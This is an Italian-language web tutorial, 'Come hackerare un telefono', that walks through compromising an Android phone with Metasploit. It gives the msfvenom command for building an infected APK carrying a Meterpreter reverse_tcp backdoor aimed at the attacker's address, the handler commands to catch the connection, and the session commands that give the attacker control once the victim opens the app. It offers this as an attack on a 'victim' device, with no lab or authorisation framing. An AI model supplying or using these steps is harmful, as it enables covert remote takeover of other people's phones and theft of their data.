Come hackerare un telefono - come hackerare Android

Negli ultimi anni, il mercato ha aperto le sue porte a smartphone e tablet, dispositivi che hanno guadagnato velocemente sempre più popolarità, surclassando i genitori computer soprattutto per quanto riguarda l’utilizzo della rete.

Per un hacker, come per una multinazionale, lasciarsi sfuggire questa importante fetta di mercato, equivarrebbe a rimanere indietro con i tempi, essendo inevitabilmente destinati a soccombere.

 

REQUISITI:

 

 

  • Computer con un qualsiasi sistema operativo 
  • Ultima versione di Metasploit Framework che trovi qui:  METASPLOIT

 

1) Creazione della backdoor

iniziamo a creare il nostro file apk infetto.infatti Metasploit mette a disposizione anche il modulo per la creazione di file apk. Digitiamo quindi da terminale o da msfconsole il seguente comando, che ci restituirà un file apk, pronto per essere scaricato e installato sul device vittima.

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] R > [nome_file].apk

Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.

 

2)Impostare L'handler

Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole e impostiamo un handler generico per android

 

  • msfconsole
  • use exploit/multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp
  • set LHOST [ip_macchina_attaccante]
  • set LPORT [porta_per_la_connessione]

3)Lanciare l'exploit e collegarsi al dispositivo

 

lanciamo il nostro exploit digitando

 

  • exploit

e installiamo l'apk infetto sul dispositivo.

una volta fatto digitiamo

  • sessions -l
  • sessions -i [numero sessione]

4)SUCCESSO!

 

Non appena la vittima avvia l’applicazione denominata MainActivity, lo smartphone o il tablet sono sotto il nostro controllo